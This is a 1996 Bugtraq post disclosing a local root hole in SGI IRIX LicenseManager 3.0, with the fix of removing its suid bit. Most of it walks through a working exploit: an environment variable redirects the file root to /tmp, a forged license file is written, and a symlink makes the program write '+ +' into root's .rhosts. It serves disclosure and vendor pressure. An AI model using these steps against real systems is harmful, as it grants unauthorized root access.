Bugtraq mailing list archives
Irix: new LicenseManager is safe? No way
From: volobuev () t1 chem umn edu (Yuri Volobuev)
Date: Fri, 22 Nov 1996 19:41:13 -0600
Howdy, ABSTRACT LicenseManager 3.0, recently announced by SGI as a replacement for buggy version 1.0, is still suid and still highly insecure and allows any local user with access to X screen to gain root privileges. Fix: chmod -s /usr/etc/LicenseManager Move on to your next message now if you are busy. Full Story: I guess many of you read this On Thu, 21 Nov 1996, SGI Security Coordinator wrote:
Recently, a root compromise security issue with the LicenseManager program was publicly announced. <...> Silicon Graphics Inc. has investigated these issues and recommends the following steps for neutralizing exposure.
This is not correct, so to say. SGI didn't exactly listen to what I've said, I thought it was clear, but... My point was: LicenseManager is far too complex to be safe and suid at the same time. I just pointed at one of the many ways of exploiting it, there's much more in stock. I'm actually really frustrated, it's kind of disappointing when you're trying to help in fixing an important security problem and is just being ignored. I'm not a big authority, I agree, but what I was saying isn't my idea, short look at sendmail history would help anybody to learn why being suid is bad and in what ways. But SGI has just ignored the warning and LicenseManager 3.0 which is "neutralizing" the problem is still suid. Yes, LM 3.0 is far more safe than 1.0, I agree with that. So now it's not a newborn and milk bottle but teenager and pack of gum in his locker in the school (which he apparently forgot to lock). Huge leap forward. I said it once, and I'll say it again, may be repeating it few times will actually make people in charge _read_ it: PROGRAMS AS COMPLEX AS LICENSEMANAGER SHOULD NOT BE SUID. PERIOD. Those who liked that short tutorial about cdplayer crack may appreaciate a quick reinforcement. Exams are getting closer so I'll be brief. It actually took me several hours to hack it all the way through, so only main steps will be shown. As one can easily notice, LicenseManager 3.0 (LM30 for short) is considerably enhanced as compared to LM 1.0. For example, if one tries to repeat recently published exploit for LM 1.0, it won't work, because /.rhosts is not in /var/flexlm/licensefile.db. So brute force attack won't work. RTFMing can help to find it out right away, and as far as I can tell it seems to work. So let's just abandon the whole idea of forging license file and go investigate what other file I/O program actually does. Most important files live in /var/flexlm. Every lazy hacker should have a special set of LS_COLOR options (and color-aware ls, of course). Such settings should always include assigning very bright color to files with .log extension. So that you can see right away what you're going to hack in a few moments. /var/flexlm/license.dat.log is not in that writable files database, but obviously LM30 writes to it. Exactly what we need. But how to use it? Not it's time for step #2, and our friend strings tells us how. Among wide variety of environment variables used by LM30 one is standing alone, LICENSEMGR_FILE_ROOT. The very name says what it's for -- getting root (on the system, but I guess developers meant something else. Whatever). Some playing with it will quickly show that indeed that variable sets the root directory for LM30. We can now pick a new root directory: mkdir -p /tmp/var/flexlm so that we have exact equivalent of /var/flexlm, just with /tmp prepended to it. LICENSEMGR_FILE_ROOT will make LM30 aceept our understanding of what is the right root directory. setenv LICENSEMGR_FILE_ROOT /tmp Now, LM30 deals with licenses, so let's make one, we'll need it cd /tmp/var/flexlm cat > license.dat # # FLEXlm license file # FEATURE \ + + blah sgifd 1.00 01-jan-0 0 blah ^D License is all set. And of cource we need log file, don't we? ln -s /.rhosts license.dat.log now check that your DISPLAY is set correctly, and, ladies and gentlemen, please welcome: LicenseManager & Front panel will show that indeed LM30 thinks about our little joke as a license. Let's update it, and click Update... button. It will show four fields for us to fill out. Putting blah in each of them will be fine. Or whatever you feel is a good input. Some people like foo, I like blah. And, finally, click apply. Obviously, LM30 will be pissed at us, and it will log the record of our nasty behaviour, and pop up some error dialog box -- just ignore it and go straight back to the original command line: cat /.rhosts Checkpoint file /var/flexlm/license.dat Fri Nov 22 19:05:50 1996 # # FLEXlm license file # FEATURE \ + + blah sgifd 1.00 01-jan-0 0 blah You know what happens next, I guess. Moral: no one will protect your machine except you. If you want your machine to be secure, don't just accept what vendors give you -- try it by breaking it. And complain loudly and publically if it's broken. Baby doesn't cry -- mother doesn't worry, if bug is there and isn't being exploited, chances are no one will ever bother fixing it, even if it's an obvious one. If somebody tells you that SGI just couldn't have anticipated this one, laught at his face (or smile politely if it's her face, or vise versa, whatever you feel is right). Not checking for a symlink before the write in a suid program is one of the most common and lame bugs ever existed. SGI: please, don't just fix this bug and say it's OK now, more of them are right there. Don't repeat others' mistakes, don't make a program suid unless it's absolutely necessary. Make a survey among your customers and ask them, what they prefer: not allowing regular users to tweak with licences or having a security hole? I bet I know the answer. Acknolegements. I want to thank everybody who send me comments about this stuff. I really appreciate your e-mails. cheers, yuri Always speaking for myself and only for myself.
Current thread:
- Re: Serious hole in Solaris 2.5[.1] gethostbyname() (exploit, (continued)
- Re: Serious hole in Solaris 2.5[.1] gethostbyname() (exploit Craig Raskin (Nov 18)
- Re: Serious hole in Solaris 2.5[.1] gethostbyname() (exploit Paul B. Henson (Nov 18)
- Re: Serious hole in Solaris 2.5[.1] gethostbyname() (exploit Russell Street (Nov 18)
- ALERT: Solaris 2.5.1 locks up on TCP connections in Pine 3.9x Todd Vierling (Nov 18)
- Re: ALERT: Solaris 2.5.1 locks up on TCP connections in Pine 3.9x Brian Harvell (Nov 20)
- ssh w/ solaris 2.5.[1] Aleph One (Nov 18)
- Re: Serious hole in Solaris 2.5[.1] gethostbyname() (exploit Mike Battersby (Nov 18)
- Re: Serious hole in Solaris 2.5[.1] gethostbyname() (exploit Casper Dik (Nov 19)
- Futile rexecd holes jaeger (Nov 18)
- Re: Futile rexecd holes Roger Espel Llima (Nov 19)
- Irix: new LicenseManager is safe? No way Yuri Volobuev (Nov 22)
- Re: Futile rexecd holes Jon Peatfield (Nov 22)
- Administratrivia Aleph One (Nov 22)
- Administratrivia Scriptors of DOOM (Nov 23)
- A Stupid script. Efrain Torres (Nov 22)
- A Stupid script. Aleph One (Nov 24)
- AIX lquerypv Aleph One (Nov 25)
- lquerypv fix Troy Bollinger (Nov 25)
- Security Problems in XMCD David J. Meltzer (Nov 25)
- FreeBSD Security Advisory: FreeBSD-SA-96:18.lpr FreeBSD Security Officer (Nov 25)
- Digital FW2.0 question Peter Dieth (Nov 26)